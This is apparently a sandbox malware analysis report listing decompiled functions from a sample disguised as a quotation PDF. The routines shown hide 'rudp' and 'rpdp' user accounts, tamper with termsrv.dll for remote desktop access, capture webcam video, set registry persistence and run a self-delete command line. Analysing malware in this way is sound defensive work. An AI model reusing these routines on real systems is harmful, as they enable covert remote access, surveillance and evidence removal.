String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rpdp$rudp$rudp
API String ID: 3860825907-4276056546
Opcode ID: 3a7ae6c8d1f7f3413e91dd7b84d25ac5084d17c7773e4275c146e88e8bd20ec2
Instruction ID: 03da4e6dff91290771ded121698d820781d6e696a1b983682f025af4bae43305
Opcode Fuzzy Hash: 3a7ae6c8d1f7f3413e91dd7b84d25ac5084d17c7773e4275c146e88e8bd20ec2
Instruction Fuzzy Hash: 8A910A70A40108ABDB04EBA5DD92FEE7779AF14308F20406AF506F7292DB34AE55DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C79C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 131
sleepCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041C79C(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				void* _t58;
				void* _t76;
				void* _t129;
				void* _t137;

				_t138 = __eflags;
				_v8 = __ecx;
				E0041F2F0(_t58, _v8);
				_v16 = _v16 & 0x00000000;
				E0041E2F0(_v8, __eflags,  &_v16);
				if(E0041B7F0(_v8, _t138) != 0) {
					_v24 = E00406F64( &_v32, L"SeDebugPrivilege");
					_v28 = GetCurrentProcess();
					_v36 = E0041E04E(_v28, _v24);
					E00406BE2();
					_t140 = _v36;
					if(_v36 != 0) {
						E004204DD( &_v32,  *((intOrPtr*)(_v8 + 0x2c)));
						Sleep(0x3e8);
					}
				}
				E00406F64( &_v20, L"%SystemRoot%\\System32\\termsrv.dll");
				E0041B6CC(_v8, _t140,  &_v20);
				_v44 =  *((intOrPtr*)(_v8 + 0x54));
				_v40 = E00406F64( &_v48, L"rudp");
				E0042138C(_v44, _t140, _v40);
				E00406BE2();
				_v56 =  *((intOrPtr*)(_v8 + 0x54));
				_v52 = E00406F64( &_v60, L"rpdp");
				E0042138C(_v56, _t140, _v52);
				E00406BE2();
				if(_a4 != 0) {
					E00406FBC(_t137, _v8 + 0x38);
					E0041EE12( &_v60);
					_pop(_t129);
					E00406FBC(_t137, _v8 + 0x3c);
					E0041EE12(_t129);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t76 = E0040164E(_v8 + 0x44);
					_t143 = _v12 - _t76;
					if(_v12 >= _t76) {
						break;
					}
					_v64 = _v8 + 0x44;
					E0041ACE9(_v8, _t143, E004043F7(_v64,  &_v68, _v12));
					E00406BE2();
					_v12 = _v12 + 1;
				}
				Sleep(0x1f4);
				__eflags = _v8 + 0x28;
				E0041ACE9(_v8, __eflags, _v8 + 0x28);
				Sleep(0x1f4);
				E0041AF06(_v8, __eflags, 0);
				E0041F2DE(E0041E2A7(_v8, __eflags, _v16), _v8);
				return E00406BE2();
			}

0x0041c79c
0x0041c7a2
0x0041c7a8
0x0041c7ad
0x0041c7b5
0x0041c7c5
0x0041c7d4
0x0041c7dd
0x0041c7ed
0x0041c7f3
0x0041c7f8
0x0041c7fc
0x0041c804
0x0041c80f
0x0041c80f
0x0041c7fc
0x0041c81d
0x0041c829
0x0041c834
0x0041c844
0x0041c84d
0x0041c855
0x0041c860
0x0041c870
0x0041c879
0x0041c881
0x0041c88a
0x0041c896
0x0041c89b
0x0041c8a0
0x0041c8ab
0x0041c8b0
0x0041c8b5
0x0041c8b6
0x0041c8c3
0x0041c8c9
0x0041c8ce
0x0041c8d1
0x00000000
0x00000000
0x0041c8d9
0x0041c8ef
0x0041c8f7
0x0041c8c0
0x0041c8c0
0x0041c903
0x0041c90c
0x0041c913
0x0041c91d
0x0041c928
0x0041c939
0x0041c947

APIs

Part of subcall function 0041F2F0: EnterCriticalSection.KERNEL32(0041C7AD,?,?,0041C7AD), ref: 0041F2FA

Part of subcall function 0041B7F0: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0041B82A

GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0041C7D7

Part of subcall function 0041E04E: OpenProcessToken.ADVAPI32(00000000,00000028,00000000,?,?,?,?,?,?,?,?,?,?,0041C7EB), ref: 0041E080

Part of subcall function 004204DD: OpenProcess.KERNEL32(00000001,00000000,0041C809,?,?,?,0041C809,?), ref: 004204E9
Part of subcall function 004204DD: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,0041C809), ref: 004204FD
Part of subcall function 004204DD: CloseHandle.KERNEL32(00000000,?,?,?,0041C809), ref: 00420509

Sleep.KERNEL32(000003E8), ref: 0041C80F
Sleep.KERNEL32(000001F4,?,rpdp,?,rudp,?,%SystemRoot%\System32\termsrv.dll), ref: 0041C903
Sleep.KERNEL32(000001F4,?), ref: 0041C91D

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Strings

rpdp, xrefs: 0041C863
rudp, xrefs: 0041C837
SeDebugPrivilege, xrefs: 0041C7C7
%SystemRoot%\System32\termsrv.dll, xrefs: 0041C815

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Process$OpenSleep$lstrlen$CloseCriticalCurrentEnterHandleManagerSectionTerminateTokenlstrcpy
String ID: %SystemRoot%\System32\termsrv.dll$SeDebugPrivilege$rpdp$rudp
API String ID: 1615772483-3294973712
Opcode ID: 1b4455ae29f9c64dc38118b38ee83afabaed5a29a28c702179a94041cc774f1b
Instruction ID: 53d8144f18b353a995ab85dcc2281928aab69e452b98d0552119811518653b0a
Opcode Fuzzy Hash: 1b4455ae29f9c64dc38118b38ee83afabaed5a29a28c702179a94041cc774f1b
Instruction Fuzzy Hash: 8951EC71E00119EFCB04EBA5E992AEDB7B5AF08308F20406EF402B7291DB785E55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D46A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040D46A(intOrPtr __edx, char* _a4) {
				int _v8;
				char* _v12;
				long _v16;
				char* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _FILETIME _v40;
				intOrPtr _v52;
				char _v56;
				struct _SYSTEMTIME _v72;
				SYSTEMTIME* _t46;
				struct _FILETIME* _t51;
				intOrPtr _t59;

				_t59 = __edx;
				_v16 = _v16 & 0x00000000;
				_v20 = _a4;
				_v12 = StrStrA(_v20, "\r\nDate");
				_v12 = _v12 + 7;
				_v24 = _v12;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v40.dwLowDateTime = 0;
				_v40.dwHighDateTime = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t46 =  &_v72;
				__imp__InternetTimeToSystemTimeA(_v24, _t46, 0);
				_v8 = _t46;
				if(_v8 == 0) {
					_v16 = GetLastError();
				}
				_v8 = SystemTimeToFileTime( &_v72,  &_v40);
				if(_v8 == 0) {
					_v16 = GetLastError();
				}
				_t51 =  &_v40;
				__imp__WsFileTimeToDateTime(_t51,  &_v56, 0);
				_v8 = _t51;
				_v32 = _v56;
				_v28 = _v52;
				_v32 = E00401100(E00401190(_v32, _v28, 0x4e72a000, 0x918), _t59, 0x4e72a000, 0x918);
				_v28 = _t59;
				return _v32;
			}

0x0040d46a
0x0040d471
0x0040d478
0x0040d489
0x0040d492
0x0040d498
0x0040d4a0
0x0040d4a1
0x0040d4a2
0x0040d4a3
0x0040d4a6
0x0040d4a9
0x0040d4b1
0x0040d4b2
0x0040d4b3
0x0040d4b4
0x0040d4b7
0x0040d4be
0x0040d4c4
0x0040d4cb
0x0040d4d3
0x0040d4d3
0x0040d4e4
0x0040d4eb
0x0040d4f3
0x0040d4f3
0x0040d4fc
0x0040d500
0x0040d506
0x0040d50f
0x0040d512
0x0040d53b
0x0040d53e
0x0040d549

APIs

StrStrA.SHLWAPI(?,Date), ref: 0040D483
InternetTimeToSystemTimeA.WININET(?,?,00000000), ref: 0040D4BE
GetLastError.KERNEL32 ref: 0040D4CD
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040D4DE
GetLastError.KERNEL32 ref: 0040D4ED
WsFileTimeToDateTime.WEBSERVICES(?,?,00000000), ref: 0040D500
__aulldiv.LIBCMT ref: 0040D525

Strings

Date, xrefs: 0040D47B

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Time$ErrorFileLastSystem$DateInternet__aulldiv
String ID: Date
API String ID: 2581324138-1812262276
Opcode ID: 35cf07de3c8c83cbf36e4818ace6da39e121bb5564ca5c531764bdb22a46ef99
Instruction ID: c9cb100ef3d427a6cde93ca9f9bfdbd2603a0eb21b288534cd1295f84024e4b0
Opcode Fuzzy Hash: 35cf07de3c8c83cbf36e4818ace6da39e121bb5564ca5c531764bdb22a46ef99
Instruction Fuzzy Hash: CF31A2B5E00209FFDB40DFE8D945AEEBBB5AB08311F10806AE501F6260E7746A458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00421853 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 41
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421853(WCHAR* _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				int _v20;

				if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\_rptls", 0, 0xf003f,  &_v8) != 0) {
					RegCreateKeyExW(0x80000001, L"SOFTWARE\\_rptls", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
				}
				_v12 = lstrlenW(_a4) << 2;
				_v16 = _v8;
				RegSetValueExW(_v16, L"Install", 0, 1, _a4, _v12);
				return RegCloseKey(_v8);
			}

0x00421876
0x00421897
0x00421897
0x004218a9
0x004218af
0x004218c4
0x004218d4

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,005601F8,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA,?), ref: 0042186E
RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,005601F8,?,?,?,0042191F,005601F8), ref: 00421897
lstrlenW.KERNEL32(0042191F,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA,?,?), ref: 004218A0
RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,0042191F,0042191F,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA), ref: 004218C4
RegCloseKey.ADVAPI32(005601F8,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA,?,?), ref: 004218CD

Strings

SOFTWARE\_rptls, xrefs: 0042188D
Install, xrefs: 004218BC
SOFTWARE\_rptls, xrefs: 00421864

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenValuelstrlen
String ID: Install$SOFTWARE\_rptls$SOFTWARE\_rptls
API String ID: 2036214137-1349175574
Opcode ID: b2e2a1aae3e1a60348e58ed49385c2b423af6da38d1668299a5b067510aaa49f
Instruction ID: 120e28971fc7820ea409a9bb676ee5365d29c418c2e3878a2053060d4daa8bee
Opcode Fuzzy Hash: b2e2a1aae3e1a60348e58ed49385c2b423af6da38d1668299a5b067510aaa49f
Instruction Fuzzy Hash: CA01FB31B40208FFEB21DF94DD46FAD7B78EB04B41F600061B605B50E1D6B1AA51EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00422DAB Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00422DAB(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v90;
				intOrPtr _v96;
				intOrPtr _v100;
				void _v104;
				void* _v160;
				char _v176;
				intOrPtr _v180;
				char _v248;
				void* _t100;
				signed int _t116;
				void* _t143;
				void* _t148;
				void* _t150;
				signed int _t153;
				void* _t163;

				_t163 = __edx;
				_v60 = __ecx;
				__imp__CoInitialize(0);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				__imp__CoCreateInstance(0x4263e0, 0, 1, 0x42a4a8, E004045FD( &_v12));
				if(_v12 != 0) {
					_v32 =  *((intOrPtr*)( *_v12));
					_v32(_v12, 0x4263c0,  &_v16);
					if(_v16 != 0) {
						 *((intOrPtr*)( *_v16 + 4))(_v16);
						E004231FC( &_v20, _a4,  &_v20);
						if(_v20 != 0) {
							_t100 = E004045FD( &_v8);
							_pop(_t148);
							__imp__CoCreateInstance(0x426430, 0, 1, 0x42a498, _t100);
							if(_v8 != 0) {
								_v36 =  *((intOrPtr*)( *_v8 + 0xc));
								_v36(_v8, _v20, L"Source");
								_v40 =  *((intOrPtr*)( *_v8 + 0xc));
								_v40(_v8, _v16, L"Grabber");
								E0040132F( &_v176, 0, 0x48);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v44 =  *((intOrPtr*)( *_v12 + 0x10));
								_v44(_v12,  &_v176);
								_t116 = E00422CC8(_t148, _v20, 0);
								_pop(_t150);
								_v24 = _t116;
								if(_v24 != 0) {
									_v28 = E00422CE9(_t150, _v16, 0);
									if(_v28 != 0) {
										_v48 =  *((intOrPtr*)( *_v8 + 0x2c));
										_push(_v28);
										_push(_v24);
										_push(_v8);
										if(_v48() >= 0) {
											_v52 =  *((intOrPtr*)( *_v12 + 0x14));
											_v52(_v12,  &_v248);
											_v56 = _v180;
											_t153 = 0xa;
											memcpy( &_v104, _v56 + 0x30, _t153 << 2);
											E00422A2F( &_v248);
											E0042330A(_v60, _t163, _a4, _v96, _v100, _v90);
										}
									}
								}
							}
						}
					}
				}
				E00404D45( &_v20);
				E00404D45( &_v16);
				E00404D45( &_v8);
				E00404D45( &_v12);
				E00404D45( &_v24);
				_t143 = E00404D45( &_v28);
				__imp__CoUninitialize();
				return _t143;
			}

0x00422dab
0x00422db6
0x00422dbb
0x00422dc1
0x00422dc5
0x00422dc9
0x00422dcd
0x00422dd1
0x00422dd5
0x00422df2
0x00422dfc
0x00422e0f
0x00422e1e
0x00422e25
0x00422e39
0x00422e43
0x00422e4e
0x00422e5e
0x00422e63
0x00422e73
0x00422e7d
0x00422e91
0x00422e9f
0x00422eaa
0x00422eb8
0x00422ec6
0x00422ed9
0x00422eda
0x00422edb
0x00422edc
0x00422ee8
0x00422ee9
0x00422eea
0x00422eeb
0x00422ef4
0x00422f01
0x00422f09
0x00422f0f
0x00422f10
0x00422f17
0x00422f2f
0x00422f36
0x00422f44
0x00422f47
0x00422f4a
0x00422f4d
0x00422f55
0x00422f63
0x00422f70
0x00422f79
0x00422f84
0x00422f88
0x00422f91
0x00422fa6
0x00422fa6
0x00422f55
0x00422f36
0x00422f17
0x00422e7d
0x00422e4e
0x00422e25
0x00422faf
0x00422fb9
0x00422fc3
0x00422fcd
0x00422fd7
0x00422fe1
0x00422fe7
0x00422ff0

APIs

CoInitialize.OLE32(00000000), ref: 00422DBB
CoCreateInstance.OLE32(004263E0,00000000,00000001,0042A4A8,00000000), ref: 00422DF2
CoUninitialize.OLE32(00000000,?,?,?), ref: 00422FE7

Strings

Grabber, xrefs: 00422EAD
vids, xrefs: 00422ECE
Source, xrefs: 00422E94

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: Grabber$Source$vids
API String ID: 948891078-4200688928
Opcode ID: 511d612f62780731acce557e6223a986e102f21a457ddf4a9dbe0d45de01720f
Instruction ID: 0e1a1ff4ad558d548a3fee013500d577e75595de9375d0d12eb8246752e1a91b
Opcode Fuzzy Hash: 511d612f62780731acce557e6223a986e102f21a457ddf4a9dbe0d45de01720f
Instruction Fuzzy Hash: 23713872E00218FFDF00DF90E945BEEBBB5AF08311F514066FA01BB290C7B89A459B18

Uniqueness

Uniqueness Score: -1.00%

Function 00421486 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00421486() {
				intOrPtr _v8;
				signed int _v12;
				char _v13;
				char _v14;
				char _v15;
				intOrPtr* _v20;
				intOrPtr* _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				struct _PROCESS_INFORMATION _v80;
				struct _STARTUPINFOA _v148;
				char _v408;
				char _v928;
				intOrPtr _t142;
				signed int _t151;
				char _t153;
				short _t154;
				void* _t166;

				_v8 = _t142;
				E004206D2(_t142, 0x80000001, _v8 + 0x10);
				if(E0040AFB4(_v8 + 0x30) != 0) {
					TerminateThread( *0x560608, 0);
				}
				if(E0040B00C(_v8 + 0x30) != 0) {
					_v32 = _v8 + 4;
					E00420997(_v32,  *((intOrPtr*)(_v8 + 8)), _v8 + 0x14, 0x20006, 0);
					_v40 = _v8 + 4;
					_v36 = _v8 + 0x30;
					if(E00420720(_v40, E0040AFE0(_v36,  &_v44)) != 0) {
						_v28 = _v28 & 0x00000000;
					} else {
						_v28 = 1;
					}
					_v13 = _v28;
					E00406BE2();
					E004207E9(_v8 + 4);
				}
				E0040B038(_v8 + 0x30);
				E0040132F( &_v148, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v408, 0x104);
				_v12 = _v12 & 0x00000000;
				_t151 = 0xd;
				memcpy( &_v928, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", _t151 << 2);
				asm("movsw");
				asm("movsb");
				_v12 = _v12 + 0x37;
				_t153 = "\""; // 0x22
				 *((char*)(_t166 + _v12 - 0x39c)) = _t153;
				_v12 = _v12 + 1;
				_v20 =  &_v408;
				_v48 = _v20 + 1;
				do {
					_v14 =  *_v20;
					_v20 = _v20 + 1;
				} while (_v14 != 0);
				_v52 = _v20 - _v48;
				E00401309(_t166 + _v12 - 0x39c,  &_v408, _v52);
				_v24 =  &_v408;
				_v56 = _v24 + 1;
				do {
					_v15 =  *_v24;
					_v24 = _v24 + 1;
				} while (_v15 != 0);
				_v60 = _v24 - _v56;
				_v12 = _v12 + _v60;
				_t154 = "\""; // 0x22
				 *((short*)(_t166 + _v12 - 0x39c)) = _t154;
				_v64 = CreateProcessA(0,  &_v928, 0, 0, 0, 0x8000000, 0, 0,  &_v148,  &_v80);
				CloseHandle(_v80.hThread);
				CloseHandle(_v80);
				ExitProcess(0);
			}

0x00421491
0x004214a0
0x004214b4
0x004214be
0x004214be
0x004214d1
0x004214d9
0x004214f3
0x004214fe
0x00421507
0x00421521
0x0042152c
0x00421523
0x00421523
0x00421523
0x00421533
0x00421539
0x00421544
0x00421544
0x0042154f
0x0042155f
0x0042156c
0x0042156d
0x0042156e
0x0042156f
0x0042157e
0x00421584
0x0042158a
0x00421596
0x00421598
0x0042159a
0x004215a1
0x004215a7
0x004215ad
0x004215b8
0x004215c1
0x004215c8
0x004215cb
0x004215d0
0x004215d3
0x004215d6
0x004215e2
0x004215fa
0x00421608
0x0042160f
0x00421612
0x00421617
0x0042161a
0x0042161d
0x00421629
0x00421632
0x00421638
0x0042163f
0x00421670
0x00421676
0x0042167f
0x00421687

APIs

Part of subcall function 004206D2: RegDeleteKeyW.ADVAPI32(?,00000000), ref: 004206E2

TerminateThread.KERNEL32(00000000), ref: 004214BE
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042157E
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0042166A
CloseHandle.KERNEL32(?), ref: 00421676
CloseHandle.KERNEL32(?), ref: 0042167F
ExitProcess.KERNEL32 ref: 00421687

Strings

cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0042158B

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
API String ID: 3630425516-84290196
Opcode ID: 25b62b3f311795b401c57eeb6f08614c5cca09c1a981675b08698ecf3a25fe76
Instruction ID: caec4c6d023968f93f3b064ce43989376034cd33d201a6b2c237c9400e03b65d
Opcode Fuzzy Hash: 25b62b3f311795b401c57eeb6f08614c5cca09c1a981675b08698ecf3a25fe76
Instruction Fuzzy Hash: 95611871E00219AFEB11DBA8D941BEEBBF4AF08304F5040AAE505F7292D774AA51CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417BC1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417BC1(void* __eflags, WCHAR* _a4, char* _a8, int _a12) {
				void* _v8;
				int _v12;
				short _v532;

				_v12 = 1;
				E0040132F( &_v532, 0, 0x104);
				lstrcpyW( &_v532, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v532, _a4);
				if(RegOpenKeyExW(0x80000002,  &_v532, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v12, _a8,  &_a12);
				RegCloseKey(_v8);
				return 1;
			}

0x00417bca
0x00417bdf
0x00417bf3
0x00417c03
0x00417c25
0x00000000
0x00417c50
0x00417c3c
0x00417c45
0x00000000

APIs

lstrcpyW.KERNEL32 ref: 00417BF3
lstrcatW.KERNEL32(?,00000001), ref: 00417C03
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000104), ref: 00417C1D
RegQueryValueExW.ADVAPI32(00000104,Path,00000000,00000001,?,0041580F), ref: 00417C3C
RegCloseKey.ADVAPI32(00000104), ref: 00417C45

Strings

Path, xrefs: 00417C34
Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 00417BE7

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcatlstrcpy
String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\
API String ID: 3135247354-2411794369
Opcode ID: a43378aa4e9744d876e4f9680e47be7800f1b97189eeab677c7777e997698f0a
Instruction ID: 1ecdc7a5a601776f7d5d4d19556457e52a0c833fd1a8a1d114e11c9982ff8737
Opcode Fuzzy Hash: a43378aa4e9744d876e4f9680e47be7800f1b97189eeab677c7777e997698f0a
Instruction Fuzzy Hash: 75017171A5010DFBDF20EBA0DC89FEE7B7CFB04304F500465B605E5090E7B596959B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4FF Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B4FF(signed char _a4) {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				signed int _t11;

				_v12 = LoadLibraryA("USER32.DLL");
				_v8 = GetProcAddress(_v12, "MessageBoxA");
				_t11 = _a4 & 0x000000ff;
				if(_t11 == 0) {
					if(_v8 != 0) {
						_v16 = _v8;
						_t11 = _v16(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t11;
			}

0x0040b510
0x0040b521
0x0040b524
0x0040b52a
0x0040b530
0x0040b535
0x0040b549
0x0040b549
0x0040b54e
0x0040b54e
0x0040b555

APIs

LoadLibraryA.KERNEL32(USER32.DLL,0041F411,?), ref: 0040B50A
GetProcAddress.KERNEL32(?,MessageBoxA), ref: 0040B51B
ExitProcess.KERNEL32 ref: 0040B54E

Strings

MessageBoxA, xrefs: 0040B513
An assertion condition failed, xrefs: 0040B542
Assert, xrefs: 0040B53D
USER32.DLL, xrefs: 0040B505

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
API String ID: 881411216-1361702557
Opcode ID: 805f8ac564efec431f260f42541e3039021c7059635974b3853fa715fa7680b9
Instruction ID: 23536d06708e3d6f2b12d2a2b4c5134ceb89ed1373bd5f53219f3e8b46a80356
Opcode Fuzzy Hash: 805f8ac564efec431f260f42541e3039021c7059635974b3853fa715fa7680b9
Instruction Fuzzy Hash: 7BF01230B40319FBDB109BA4AD4AB5C7BF0EB44709F5140B6A400B12D1D7B45A55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8ED Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B8ED() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;

				_v12 = LoadLibraryA("USER32.DLL");
				_v8 = GetProcAddress(_v12, "MessageBoxA");
				if(_v8 != 0) {
					_v16 = _v8;
					_v16(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}

0x0040b8fe
0x0040b90f
0x0040b916
0x0040b91b
0x0040b92f
0x0040b92f
0x0040b934

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 0040B8F8
GetProcAddress.KERNEL32(?,MessageBoxA), ref: 0040B909
ExitProcess.KERNEL32 ref: 0040B934

Strings

PureCall, xrefs: 0040B923
USER32.DLL, xrefs: 0040B8F3
MessageBoxA, xrefs: 0040B901
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 0040B928

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
API String ID: 881411216-4134947204
Opcode ID: 52236983f2f61d94461256b9505b873aaed6c6301b4bbe318b4c4fcf21b42fab
Instruction ID: 3d4833c1cdd9f7fadf50a2e97523a47213062a5169a14dbff5926ab827ba25bc
Opcode Fuzzy Hash: 52236983f2f61d94461256b9505b873aaed6c6301b4bbe318b4c4fcf21b42fab
Instruction Fuzzy Hash: 5EE0ED74F41318FFDB10BBA4D90AB9CBBB0EB04B01F9140B5E501722D1D6B41A51DE59

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB2F Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BB2F(intOrPtr __ecx, void* __eflags) {
				signed int _v5;
				signed char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
